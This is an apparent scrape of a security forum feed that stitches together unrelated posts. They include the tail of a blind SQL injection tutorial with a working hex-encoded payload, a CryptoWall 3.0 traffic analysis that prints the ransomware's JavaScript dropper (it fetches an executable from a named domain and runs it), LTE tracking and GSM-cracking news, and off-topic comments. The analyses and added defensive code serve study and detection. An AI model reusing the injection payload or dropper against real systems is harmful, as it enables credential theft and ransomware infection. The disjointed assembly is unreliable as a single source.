" ';declare @P varchar(4000);set @P=cast(0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 AS varchar(4000));exec(@P);-- "

The 0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 is simply a hex-encoded version of the string, " if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30' . " One extra thing we need to do is to add payload processing rules in Intruder to hex-encode both of our payloads since they occur within the hex cast.

Now when we run this attack, we get the same results as before and we retrieve the password for "Jake_Reynolds" with one exception. Our values are now ASCII-hex-encoded values of ASCII-decimal codes. This time, our results are hexadecimal values for our decimal ASCII codes. So if you follow it:
Payload 1 value 0x31 = 1 = Payload 2 value 0x38 0x30 = 80 = "P"
Payload 1 value 0x32 = 2 = Payload 2 value 0x36 0x34 = 64 = "@"
Payload 1 value 0x33 = 3 = Payload 2 value 0x35 0x33 = 53 = "5"
and so on until you get "P@55w0rd," an admittedly bad password to use on my precious FoundStone bank account.

Anyway, that's blind, delay-based, SQL injection data extraction the hard way using BurpSuite to make it easier.

Source: https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss
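The post makes two defensive points in passing: keyword filtering does not stop injection (the hex-cast trick hides "select" and "waitfor" from a filter that looks at the raw request), and the real fix is parameterized queries. The script below is an added example, not the post's or HacmeBank's code, and covers both. It builds a stand-in "fsb_users" table in SQLite (MS SQL's WAITFOR is not needed to show the structural problem), shows the string-concatenated login query beside the parameterized one, and implements a keyword check that first decodes 0x... literals, so it sees through the post's hex-cast payload where a naive check does not. The table contents, the SQLite choice and the `HEX_CAST_PAYLOAD` constant (which copies the post's payload verbatim) are the example's own.

```python
import re
import sqlite3

# Added example: the vulnerable dynamic query beside its parameterized form, plus a keyword
# check that decodes hex literals. The database is a constructed stand-in for HacmeBank.


def make_db():
    """In-memory SQLite table modelled on the post's 'fsb_users' (one constructed row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE fsb_users (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)")
    con.execute("INSERT INTO fsb_users (user_name, password) VALUES ('Jake_Reynolds', 'P@55w0rd')")
    return con


def login_vulnerable(con, user_name, password):
    """Dynamic SQL: input is spliced into the statement, so a quote closes the literal and
    '--' comments out the password check. This is the 'before' the post describes."""
    sql = ("SELECT user_id FROM fsb_users WHERE user_name = '%s' AND password = '%s'"
           % (user_name, password))
    return con.execute(sql).fetchone() is not None


def login_parameterized(con, user_name, password):
    """Placeholders: values travel separately from the statement and can never alter it."""
    sql = "SELECT user_id FROM fsb_users WHERE user_name = ? AND password = ?"
    return con.execute(sql, (user_name, password)).fetchone() is not None


# --- keyword filtering, with and without decoding hex literals ---------------------------

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")
SQL_KEYWORDS = ("select", "waitfor", "union")


def decode_hex_literals(text):
    """Replace each 0x... literal with its ASCII decoding, i.e. what cast(... AS varchar)
    followed by exec() will actually run on the server."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:          # not a byte string; leave it untouched
            return match.group(0)
        return bytes.fromhex(digits).decode("ascii", errors="replace")
    return HEX_LITERAL.sub(repl, text)


def naive_keyword_filter(text):
    """The kind of filter the post bypasses: looks for keywords in the raw request only."""
    lowered = text.lower()
    return any(keyword in lowered for keyword in SQL_KEYWORDS)


def keyword_filter_with_decoding(text):
    """Same check after hex literals are decoded; catches the post's hex-cast payload."""
    return naive_keyword_filter(decode_hex_literals(text))


# The post's hex-cast payload, copied verbatim.
HEX_CAST_PAYLOAD = (
    "';declare @P varchar(4000);set @P=cast(0x696620286173636969287375627374"
    "72696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f"
    "757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c64"
    "7327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a33"
    "3027 AS varchar(4000));exec(@P);--"
)

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, real credentials:", login_vulnerable(con, "Jake_Reynolds", "P@55w0rd"))
    print("vulnerable, comment trick:   ", login_vulnerable(con, "Jake_Reynolds'--", "wrong"))
    print("parameterized, comment trick:", login_parameterized(con, "Jake_Reynolds'--", "wrong"))
    print("naive filter sees keywords:  ", naive_keyword_filter(HEX_CAST_PAYLOAD))
    print("decoding filter sees them:   ", keyword_filter_with_decoding(HEX_CAST_PAYLOAD))
    print("decoded payload:", decode_hex_literals(HEX_CAST_PAYLOAD))
```

The decoding filter is there to show why the post's bypass works, not as a recommended control: another encoding layer (char() concatenation, nested casts) would need another decoder, which is the author's point that validation is a losing race. The parameterized query does not care what the input decodes to, because it is never part of the statement.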
-
CryptoWall 3.0 traffic analysis Posted on October 29, 2015 by Admin A glimpse inside CryptoWall 3.0 Background CryptoWall is known to be one the most popular ransomware.The FBI says it has received 992 complaints about CryptoWall, with victims reporting losses of $18m. Symantec also said that ransomware attacks have more than doubled in 2014 from 4.1 million in 2013, up to 8.8 million. It’s using today’s most sophisticated exploit kit such as Nuclear, Neutrino, and Angler in order to infect the victim. Consequently, this ransomware is using all ways possible to infect victims. The main goal of this destructive malware is to search for all file with certain extensions on the computer victim and network drives to encrypt them. It then asks for a ransom, which is normally $500 USD (and doubles after a certain period of time) for decryption. CryptoWall payment pageInfection Vector The ransomware has multiple ways to infect victims. However, we often see malicious infected email attachments sent to victims containing the dropper. One of the dropper that we studied came from an email attachment in a .zip file. It contained an obfuscated JavaScript file which is used for downloading the payload. It is also common to see word documents containing a malicious VBA macro. 
.ZIP file received by email, containing a JavaScript fileAfter deobfuscation of the file, we got this code: function dl(fr, fn, rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function (){ if (xo.readyState === 4){ var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn, 2); xa.close(); }; } ; try { xo.open("GET", fr, false); xo.send(); if (rn > 0) { ws.Run(fn, 0, 0); }; } catch (er){ } ; }dl("http://22072014b.com/images/global1.jpg", "16477935.exe", 1);dl("http://22072014b.com/images/global1.jpg", "89555869.exe", 1); This script is used to download the payload (from a hard coded URL) of CryptoWall 3.0, rename it and execute it from the TEMP directory. It’s interesting to note that the original payload is a .JPG file, which is a simple trick to hide itself. We believe that this domain (22072014b.com) is owned by the bad guy and it’s also seems to use the fast flux DNS technique. 
However, this domain is currently suspended by the ICANN.Execution As described in many articles¹ ² ³, CryptoWall begins by: Generating a unique computer identifier by calculation of an MD5 hash base on the system hardware and software (Computer name, Volume serial number, OS version …) Spreading itself in a new folder in C:\ and the AppData folder then adding an entry in startup program Deactivating: Shadow Copies Startup repair Windows error recovery [*]And stopping: Windows Security Center Service Windows Defender Windows Update Service Windows Error Reporting Service and BITS [*]Injecting itself into explorer.exe , svchost.exe [*]Making a GET request to ip-addr.es to retrieve the external IP address [*]Making HTTP requests to retrieve the public key for encryption [*]Starting encryption (AES-256) of selected files, extensions and directory [*]Copying HELP_DECRYPT instructions in every folder in which files were encrypted Although this process is complex enough to make an article on it’s own, the area that we’ve focused on is mostly the network communication side.Emulate communication with the C&C In order to learn more about the communication with the Command And Control, a program was made to simulate the request of an infected computer.First, the malware uses a URL pre-coded in the payload to start the communication. In all cases, the URL’s are infected WordPress websites. Because infected WordPress gets cleaned up or suspended within a few weeks normally, CryptoWall comes with numerous pre-coded URL with which it will try to communicate. The URL changes each time we see a new sub-version of CryptoWall 3.0.The URL looks like the following:http://domain.com/wp-content/plugins/infected_path/3.phpAll communication with the C&C is encrypted in RC4. 
The RC4 key is passed in the URL parameter and the cipher text is in the POST method.

The malware first sends a hello message to the C&C before getting the actual encryption key. Using this Python, we can decrypt the message easily:

Request: {1|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|5|2|1||128.204.196.126}
Response: {264|1}

The message is formatted for the command and control, revealing: the message ID, the version of CryptoWall, the unique MD5 hash previously generated, some other flags and the public IP address of the computer.

After, the infected computer replies with another message:

Request: {7|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|1}
Response: {176|ayh2m57ruxjtwyd5.onion|1egeY33|NL|-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY6b3Ea6NYvFAz3BMBRr
zS9TZrnAdg2FksXisD95iFBSbWjMXQlWf4YuU84cyDvmRBpicbaN6K3Rkk1EjW4G
lAA3jEZi2IvapsJpKoXhMIVxOhqbni+LQMsdsnEB+3FGWNHW7YvBwUSDvJbD+0qG
i1fNzbL/AZ8Wz5g7wbrUzGSsi+Yjj37nQuPRDz4AheKayMsz9ENvOLvqhA+Malpv
eOLwDMncsRr4byu9QuWRCvyoas5z86IBq/l4LKGeJO1my6ICvRQZ4QExwDTQBWKy
0G7B8niBVYHDOHIe3Owp2C6y7WzolP97WCwsuYB2kmGHnhtas4uTRQ/6IYZcK47E
gQIDAQAB
-----END PUBLIC KEY-----}

At this last stage, the C&C replied with the TOR link for the ransom, the personal ID and the public RSA key. The infected computer will then start encrypting files with that key.

Knowing this, we were able to establish by ourselves the different values that would be sent to the C&C in our program. We only had to generate MD5 hashes that hadn't already been received by the ransomware server to make it believe that we were a new victim. One of the ideas was to exhaust the server with our requests. Using this program in a loop, we were able to generate many different unique IDs and public keys. Since a unique ID is normally 7 characters long (case-sensitive, plus a mix of digits), 58^7 IDs are possible in theory.
Because we're able to generate no more than 1000 requests per minute, it would have taken far too long to exhaust all possible IDs.

Investigation on the infected WordPress

To advance further in the investigation, we chose to take a look at recent samples of CryptoWall 3.0 from Hybrid Analysis to find commonalities between the different infected WordPress sites. After looking at multiple infected pages, we didn't notice any common vulnerability, except that the infected path always seems to be part of a WordPress plugin.

However, two of the WordPress sites observed had a PHP backdoor installed, which is a PHP file that allows the attacker to have a web control panel:

With this malicious code, they can access and control multiple things on the servers. Furthermore, this allowed us to download the code which serves to respond to infected computers. Getting our hands on this file allowed us to move forward to better understand the communication and the infection process. What we can see in this PHP code is that the ransomware:

- Decrypts the encrypted message with the RC4 key in the parameter
- Makes validation to ensure that the message is in the good format and strips the brackets
- Forwards the message content to the mothership at the hard-coded IP address

We tried it by installing a PHP server on a local computer and making a fake call to the CryptoWall PHP file. We then captured the traffic exchanged between the server and the mothership:

Request: {7|crypt19|7A1A7EA984BD56663C7A5558576C3559|1}

So it becomes clear that the infected WordPress only acts as a filter and a relay. It also helps to conceal the ransomware infrastructure.

Since the file in question was used at the same time to respond to infected computers, we took the opportunity to add a few lines of code to record the requests made to it in a text file. We also neutralized the code by commenting out the part which forwarded the request.
The output file gave us information about the time at which the request was made, the originating IP address and the CryptoWall message (version, unique MD5 identifiers ...) for each computer calling it.

Each of these entries represents a query made by an infected computer to this specific infected page. On the first website, we were able to collect data only for 29 hours before the account got suspended by the provider (2015-09-30 to 2015-10-02) and we got 40228 entries in the text file. The second one lasted 88 hours before the bandwidth limit was exceeded and allowed us to get 130146 entries (capturing from 2015-10-23 to 2015-10-27).

After removing redundant entries in both files by comparing the unique identifier of victims (MD5 hash), only 3546 entries were left from the first one and 15068 from the second one. The reason why so many entries were duplicated is because a unique infected computer will sometimes make more than 2 requests before being able to receive an answer from the C&C.

We then used Elasticsearch and Kibana to visually represent the data:

Requests made to the first WordPress site over 29 hours
Requests made to the second WordPress site over 88 hours

We then aggregated the data of both WordPress sites to pull out statistics about the victims. The MaxMind databases were used to find the country and the AS from the originating IP addresses of those entries:

Top originating AS of victims
Top country of victims
World map representing victims' location from our dataset

Multiple sub-versions of CryptoWall were also observed:

Different versions used by CryptoWall

By regrouping both sets of data together and removing the duplicate entries based on the MD5 hash, we accumulated 18614 unique infected users. On the first set of data, 3546 unique IDs were collected over a period of 29h, which makes approximately 122.27 unique victims per hour.
On the second set of data, 15068 unique IDs were collected over a period of 88h, which makes approximately 171.22 unique victims per hour. Calculating the average of both, we obtain approximately 146 unique infected users per hour, which makes 3504 per day and 105120 per month. Using numbers from US-CERT via Symantec, approximately 2.9% of users pay the ransom. With an average ransom of $500, this meant malicious actors profited $52560 per day, $1576800 per month and $18921600 per year just with this part of the infrastructure that was discovered. However, it is difficult to be 100% accurate with these numbers.

Glimpse of the Mothership

Since we now had the IP address of the mothership from the PHP files on the infected WordPress, we started investigating it. The first IP was 95.128.182.22 and the second 95.128.182.121. Both of the IPs were registered by an ISP named TrustInfo, in Moscow, Russia. The IP addresses have at least 3 open ports in common: 22, 80 and 3389. By browsing through them, we can't see much except a blank page on the main page. But after looking for other active pages on the servers, we found that the server status page was enabled:

As you can see, the server is apparently hosting a TOR hidden website (xtpdvz6dnj5nnpe7.onion). This hidden website is also a known TOR address from the ransom of CryptoWall 3.0. It's using an NGINX proxy to forward requests. The POST requests that we're seeing are all the different WordPress sites forwarding the requests to the MotherShip, and the parameter on each of these requests is the only RC4 key for decrypting the communication.

Accessing the ransom page directly

By taking a look at the autonomous system information, we saw that the ISP TrustInfo has 3 subnets. We decided to investigate further in those subnets, searching for servers that had the same ports open with the same version of services.
For instance, we looked for hosts that had port 22 with OpenSSH version 6.0 responding to the criteria and port 80 with NGINX 1.2.1. One subnet in particular, 95.128.180.0/22, had a lot of hosts responding to these criteria.

After verifying each of them, by establishing whether the page http://ip/server-status/ showed us the same TOR address and had the same uptime, we found 9 more servers than the two previously discovered:

CryptoWall 3.0 architecture

Thus, mothership servers are playing at least two roles: forwarding the requests of infected victims and supporting the TOR website to pay the ransom. Since NGINX is installed on all of them, and they all refer to the same Apache server, they seem to serve only as a gateway, so that makes us believe that the secret keys are stored elsewhere, well kept away from us.

By comparing all the different requests made on the server status page, some GET requests got our attention. This led us to a login page on this same server:

At first look, it seems to be the management page for the owners of CryptoWall. This page seems to be custom made. They are doing basic authentication with a username and a password. The password is hashed in MD5 client-side before being passed by the POST request to the server. After 3 failed attempts, the system refuses any more tries. It is however possible to reset the number of failed attempts by deleting the PHPSESSID cookie. However, we don't know what this page provides access to.

After monitoring the status page, we also did some statistics:

Request type received by the server
CPU load over time
Total access requests to the server over time
At its peak, the server behind the proxy has processed almost 44 GB of data in 30 days

Protection against ransomware

In order to protect computers against all types of viruses, there should always be a minimum of an updated antivirus. However, in this research we saw many samples that weren't detected by any antivirus on VirusTotal.
In these cases, email attachment filters are really useful, because a lot of the infections come from this vector. Also, limiting the advertising when surfing the internet with a proxy (to avoid the malvertising, which can exploit other vulnerabilities) and using an IPS will help. Blocking servers that infected computers will contact is not very effective, because they change very often and the payload normally knows multiple websites to contact.

Some other methods may be useful if you want to be alerted about a new infected computer making requests. You can make a rule in your firewall that alerts you when someone visits http://ip-addr.es, which is used every time by CryptoWall to gather the external IP address. Other ransomware also uses this technique but with various websites. There is also a way to be alerted by your SAN by watching the I/O by users. In fact, computers infected by a ransomware will try to encrypt network drives aggressively, which can be detected by looking at the number of transactions in a certain time frame.

You can also block the execution of programs in the temporary directory of Windows. There is no reason why a program should start from there, and it is often used by malware. This procedure will show you how to create GPOs to do that.

You should however be prepared no matter what and have backups for your systems.

Conclusion

Given that all mothership servers seem to have the same configuration, they are probably deployed automatically from a template by the attacker. Moreover, the fact that we see new WordPress sites infected with CryptoWall 3.0 almost each week demonstrates the organization of the attacker, because this also implies that they must update the ransomware each time so that the malware has the right URLs to contact.

This whole process is well structured, it evolves to avoid being detected and seems to have become the new trend for hackers to make money.
Other aspects of the ransomware would have been interesting to investigate, but because of the lack of time we didn't go any further.

Feel free to contact me for any questions, suggestions or comments at malware @ brillantit.com

References: Intel TALOS, Vallejo, Sentinel One, TrendMicro, SecureWorks

Source: http://blog.brillantit.com/?p=15
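The article's decryption script survives only as a screenshot, so here is an added Python example (not the authors' code) of the same analysis step: apply RC4 with the key taken from the URL parameter and split the braced, pipe-delimited message into the fields the article identifies in its captures. It assumes the URL parameter value is used directly as the RC4 key bytes (the article states no further derivation), and the key in the demo is a constructed value; the victim hash and IP are the ones shown in the captures above.

```python
"""Offline decoder for CryptoWall 3.0 style C&C traffic.

Added example, not code from the brillantit article. RC4 is the standard
KSA/PRGA; the field names follow the article's description of the captures.
ASSUMPTION: the URL parameter value is used as-is as the RC4 key bytes.
"""
from typing import Dict


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher; encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Field layouts observed in the article's captures.
HELLO_FIELDS = ["msg_id", "version", "victim_md5", "flag1", "flag2",
                "flag3", "reserved", "public_ip"]          # request {1|...}
KEY_RESPONSE_FIELDS = ["msg_id", "tor_host", "personal_id",
                       "country", "public_key"]            # response {176|...}


def build_hello(version: str, victim_md5: str, public_ip: str) -> bytes:
    """Plaintext hello message in the format seen in the first capture."""
    return f"{{1|{version}|{victim_md5}|5|2|1||{public_ip}}}".encode()


def parse_message(plaintext: bytes) -> Dict[str, str]:
    """Split a braced, pipe-delimited C&C message into named fields."""
    text = plaintext.decode("ascii", errors="replace").strip()
    if not (text.startswith("{") and text.endswith("}")):
        raise ValueError("not a braced C&C message: %r" % text[:40])
    fields = text[1:-1].split("|")       # the PEM key holds no '|', so this is safe
    if fields[0] == "1" and len(fields) == len(HELLO_FIELDS):
        names = HELLO_FIELDS
    elif fields[0] == "176" and len(fields) == len(KEY_RESPONSE_FIELDS):
        names = KEY_RESPONSE_FIELDS
    else:                                # unknown layout: keep positional names
        names = [f"field{i}" for i in range(len(fields))]
    return dict(zip(names, fields))


def decode_post(key_param: str, post_body: bytes) -> Dict[str, str]:
    """Decrypt a captured POST body with the key taken from the URL parameter."""
    return parse_message(rc4(key_param.encode(), post_body))


if __name__ == "__main__":
    # Constructed key; the hash and IP are the ones shown in the article's capture.
    key = "k3yFr0mUrl"
    body = rc4(key.encode(), build_hello("crypt13",
                                         "4FB5B06D293F2DD13810B2979DBA08E0",
                                         "128.204.196.126"))
    print(decode_post(key, body))
```

Because RC4 is symmetric, the same `rc4` call that decrypts a captured POST body also lets an analyst re-encrypt a known plaintext and confirm that the key recovered from the URL is the right one before trusting the decoded fields.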
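The two cheap detections the "Protection against ransomware" section suggests, an alert on any internal host fetching its external IP from ip-addr.es and an alert on a burst of writes to a network share, as an added Python example that is not the article's own tooling. The proxy and file-server log formats, the sample lines, the hostnames and the thresholds are all constructed for this example; ip-addr.es is the only indicator taken from the article.

```python
"""Two low-cost detections from the article's protection advice.

Added example (not the article's own tooling): flag internal hosts that ask
ip-addr.es for their external IP, and flag users writing to a network share
in bursts. Log formats and the sample lines are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Constructed proxy log line:  <iso-timestamp> <client-ip> <method> <url>
PROXY_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")
# Constructed file-server audit line: <iso-timestamp> <user> WRITE <path>
SHARE_LINE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) WRITE (?P<path>\S+)$")

# ip-addr.es is from the article; other ransomware uses other lookup sites,
# so extend this set from your own telemetry.
EXTERNAL_IP_SERVICES = {"ip-addr.es"}


def url_host(url: str) -> str:
    """Hostname part of a URL (scheme-less URLs and ports handled)."""
    rest = url.split("://", 1)[1] if "://" in url else url
    return rest.split("/", 1)[0].split(":", 1)[0].lower()


def external_ip_lookups(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """(timestamp, client, url) for every request to a known external-IP service."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line.rstrip())
        if m and url_host(m["url"]) in EXTERNAL_IP_SERVICES:
            hits.append((m["ts"], m["src"], m["url"]))
    return hits


def write_bursts(lines: Iterable[str], window: timedelta = timedelta(seconds=60),
                 threshold: int = 50) -> Dict[str, int]:
    """Users whose write count inside any sliding `window` reaches `threshold`,
    mapped to the largest such count (a crude encryption-burst detector)."""
    per_user: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        m = SHARE_LINE.match(line.rstrip())
        if m:
            per_user[m["user"]].append(datetime.fromisoformat(m["ts"]))
    flagged: Dict[str, int] = {}
    for user, times in per_user.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # shrink the window from the left
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[user] = max(flagged.get(user, 0), count)
    return flagged


def sample_proxy_log() -> List[str]:
    """Constructed sample: benign browsing plus one external-IP lookup."""
    return [
        "2015-10-23T10:00:01 10.0.0.7 GET http://www.example.com/index.html",
        "2015-10-23T10:00:03 10.0.0.5 GET http://ip-addr.es/",
        "2015-10-23T10:00:04 10.0.0.5 POST http://example.org/wp-content/plugins/x/3.php?v=abc",
    ]


def sample_share_log() -> List[str]:
    """Constructed sample: alice writes 60 files in 30 s, bob writes 5 in 5 min."""
    base = datetime(2015, 10, 23, 10, 0, 0)
    lines = [f"{(base + timedelta(milliseconds=500 * i)).isoformat()} alice WRITE \\\\fs1\\docs\\file{i}.docx"
             for i in range(60)]
    lines += [f"{(base + timedelta(minutes=i)).isoformat()} bob WRITE \\\\fs1\\docs\\report{i}.xlsx"
              for i in range(5)]
    return lines


if __name__ == "__main__":
    print(external_ip_lookups(sample_proxy_log()))
    print(write_bursts(sample_share_log()))
```

The window and threshold in `write_bursts` are deliberately parameters: a backup job or a large copy will also produce bursts, so tune them per share from a baseline before turning the alert into a blocking action.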
-
If it were Steve Jobs's birthday, you'd be jumping for joy and kissing his ass. This man has helped the world. https://en.wikipedia.org/wiki/Bill_%26_Melinda_Gates_Foundation
-
Low-cost IMSI catcher for 4G/LTE networks tracks phones' precise locations

$1,400 device can track users for days with little indication anything is amiss.

by Dan Goodin - Oct 28, 2015 2:59pm EET

Researchers have devised a low-cost way to discover the precise location of smartphones using the latest LTE standard for mobile networks, a feat that shatters widely held perceptions that it's immune to the types of attacks that targeted earlier specifications.

The attacks target the LTE specification, which is expected to have a user base of about 1.37 billion people by the end of the year. They require about $1,400 worth of hardware that runs freely available open-source software. The equipment can cause all LTE-compliant phones to leak their location to within a 32- to 64-foot (about 10 to 20 meter) radius and in some cases their GPS coordinates, although such attacks may be detected by savvy phone users. A separate method that's almost impossible to detect teases out locations to within an area of roughly one square mile in an urban setting.

The researchers have devised a separate class of attacks that causes phones to lose connections to LTE networks, a scenario that could be exploited to silently downgrade devices to the less secure 2G and 3G mobile specifications. The 2G, or GSM, protocol has long been known to be susceptible to man-in-the-middle attacks using a form of fake base station known as an IMSI catcher (like the Stingray). 2G networks are also vulnerable to attacks that reveal a phone's location within about 0.6 square mile. 3G phones suffer from a similar tracking flaw.
The new attacks, described in a research paper published Monday, are believed to be the first to target LTE networks, which have been widely viewed as more secure than their predecessors.

"The LTE access network security protocols promise several layers of protection techniques to prevent tracking of subscribers and ensure availability of network services at all times," the researchers wrote in the paper, which is titled "Practical attacks against privacy and availability in 4G/LTE mobile communication systems." "We have shown that the vulnerabilities we discovered in LTE access network security protocols lead to new privacy and availability threats to LTE subscribers."

Like some of its predecessors, LTE attempts to conceal the location of a specific phone by assigning it a regularly changing TMSI, short for a temporary mobile subscriber identity. When a network interacts with a handset, it will address it by its TMSI rather than by its phone number or other permanent identifier to prevent attackers monitoring network traffic from tracking the location of a given user. The 2G attack worked around this scheme by sending phones an invisible text message or imperceptibly brief call that caused the mobile network to locate the phone. That paging request allowed the researchers to tie the TMSI to the phone number.

Passive aggression versus evolved NodeB

The researchers behind the LTE attack found that similar paging requests can be triggered by social messaging apps such as those provided by Facebook, WhatsApp, and Viber with little or no indication to the owner that any tracking is taking place. A Facebook message sent by someone not in the receiver's friend list, for instance, will cause the text to be silently diverted to a folder marked "other." But behind the scenes, an attacker can use the data sent over the network to link the receiver's Facebook profile to the TMSI. The TMSI, in turn, can be used to locate the phone and track it as it moves from place to place.
A text sent through WhatsApp or Viber, meanwhile, first must be returned by the targeted phone owner. From then on, the attacker can use the apps' typing notification feature to trigger paging requests. The researchers describe such exploits as "semi-passive" because they mainly involve the passive monitoring of network traffic, rather than the impersonation and traffic manipulation found in a fully active man-in-the-middle attack.

Attackers can also opt to launch far more accurate active attacks by operating a rogue base station, which in LTE parlance is known as an eNodeB, short for evolved NodeB. To create their own eNodeB, the researchers used a computer-controlled radio known as a Universal Software Radio Peripheral that ran OpenLTE, an open-source implementation of the official LTE specification. The total cost of the gear, including the radio board and antennas, was about €1,250 (about $1,400), Ravishankar Borgaonkar, one of the researchers and a post-doctorate student at Aalto University in Finland, told Ars.

When running in active mode, the eNodeB impersonates an official base station provided by a network carrier and forces LTE phones to connect to it. The attackers can then run trouble-shooting routines that cause the handset to provide a wealth of information, including all nearby base stations and the signal strength of each one. Attackers can use the data to triangulate the precise location of the device. In some cases, the rogue eNodeB can be used to obtain the GPS coordinates of the phone.

While the active attack provides much more granular location data, it comes at a cost. Darshak, an IMSI-catcher detection app that was released at the 2014 Blackhat security conference in Las Vegas, as well as similar apps from Pwnie Express and others can easily detect the full-on attacks.
That means the semi-passive attacks may be preferable for many attackers, even though the location data is coarser.

There's another feature that makes the semi-passive attacks attractive: At least one of the LTE networks the researchers studied allowed TMSIs to last as long as three days before being changed. That means an attacker who executed such an attack could use it to track a target's comings and goings for days with an accuracy of about a half mile. While it's likely the messaging apps will try to make changes that thwart the attack, it wouldn't be surprising if there are other ways to trigger the paging requests.

But wait... there's more

The paper includes a separate attack that prevents phones from connecting to LTE networks. Such an attack would either prevent a phone from receiving voice or data service, or it would cause the devices to connect using 3G or even 2G technology, which are vulnerable to other types of exploits. In any event, the denial-of-service attacks are generally effective until after a device is rebooted.

The researchers also included Altaf Shaik, a doctoral student at Technische Universität Berlin; N. Asokan of Aalto University and University of Helsinki; Valtteri Niemi of the University of Helsinki; and Jean-Pierre Seifert, a professor at Technische Universität Berlin. They said they contacted all manufacturers and carriers affected by their research in June and July and have proposed several changes they can make to better secure their products and networks. The researchers are scheduled to present their findings at the upcoming Blackhat Security conference in Amsterdam, the T2 Security conference 2015, and the Internet Society NDSS conference. A brief description of the attacks is here.

As noted earlier, several of the vulnerabilities exploited reside in the LTE specification itself. That likely means every LTE-compatible manufacturer and carrier is vulnerable to these attacks.
A fix will almost certainly take time and money, but at least there will be near unanimous agreement among industry partners that the weaknesses represent a concrete and imminent threat to customers.

Source: http://arstechnica.com/security/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/
-
If C++ is the most powerful, why isn't it the most popular?
Nytro replied to MrGrj's topic in Programare
I read "C++ - Manual complet - Herbert Schildt". It helped me. You can try: "Limbajele C si C++ pentru incepatori - Negrescu Liviu" And for advanced readers I recommend: "Secrete C++ - Constantin Galatan" -
[h=1]The Bug Hunters Methodology[/h]

Welcome! This repo is a conglomeration of tips, tricks, tools, and data analysis to use while doing web application security assessments, and more specifically towards bug hunting in bug bounties. These methodology pieces are presented as an abbreviated testing methodology for use in bug bounties. It is based off of the research gathered for the Defcon 23 talk "How to shot Web: better hacking in 2015".

The current sections are divided as follows:

- philosophy
- discovery
- mapping
- tactical fuzzing
- XSS
- SQLi
- LFI
- CSRF
- web services
- mobile vulnerabilities

The goal of the project is to incorporate more up to date resources for bug hunters and web hackers to use during their day-to-day work.

@jhaddix

[h=2]Defcon Video[/h]

Link: https://drive.google.com/file/d/0B15XPa08CyxhQ1J2T2tOUUJuSFk/view

Source: https://github.com/jhaddix/tbhm
-
- 1
-
-
The European Parliament votes on Tuesday on the net neutrality law
Nytro replied to tjt's topic in Stiri securitate
-
Don't bother posting any more, we no longer allow: 1. roots 2. cPanels 3. VNCs 4. SMTPs ... In other words: stolen (hacked) things are no longer sold/bought.
-
HACKING GSM SIGNALS WITH AN RTL-SDR AND TOPGUW

The ability to hack some GSM signals has been around for some time now, but the steps to reproduce the hack have been long and difficult to set up. Recently RTL-SDR.com reader Bastien wrote in to us to let us know about his recently released project called Topguw. Bastien's Topguw is a Linux based program that helps piece together all the steps required in the GSM hacking process. Although the steps are simplified, you will still need some knowledge of how GSM works, have installed Airprobe and Kraken, and you'll also need a 2TB rainbow table which keeps the barrier to this hack still quite high.

Bastien writes about his software:

So like I said my software can "crack" SMS and call over GSM network. How? I put quotation marks in crack because my software is not enough to decipher GSM itself. My software can make some steps of the known-plaintext attack, introduced by Karsten Nohl, and by the way, increase the time to decipher an SMS or call. I'll not explain here all the steps because they are long and tedious, but there is a lot of work done behind the GUI. Actually my software can extract keystreams (or try to find some of them) from a capture file of GSM, or by sniffing GSM with an rtl-sdr device. Then you just have to use Kraken to crack the key and you're able to decipher SMS or call.

Why? This hack is very interesting! With only a little receiver (rtl-sdr) and some hard-disk capacity (2TB), everyone can try to hack the GSM. It's very low cost compared to other hack vectors. Moreover the success rate is really great if you guess the keystream correctly. So when I started doing this by hand I thought: why not try to make something to do this automatically. This is how Topguw was born. Topguw, I hope, will sensitize people about the risk they take by calling or sending SMS with GSM. My software is currently in beta version but I ran it several times and I got good results.
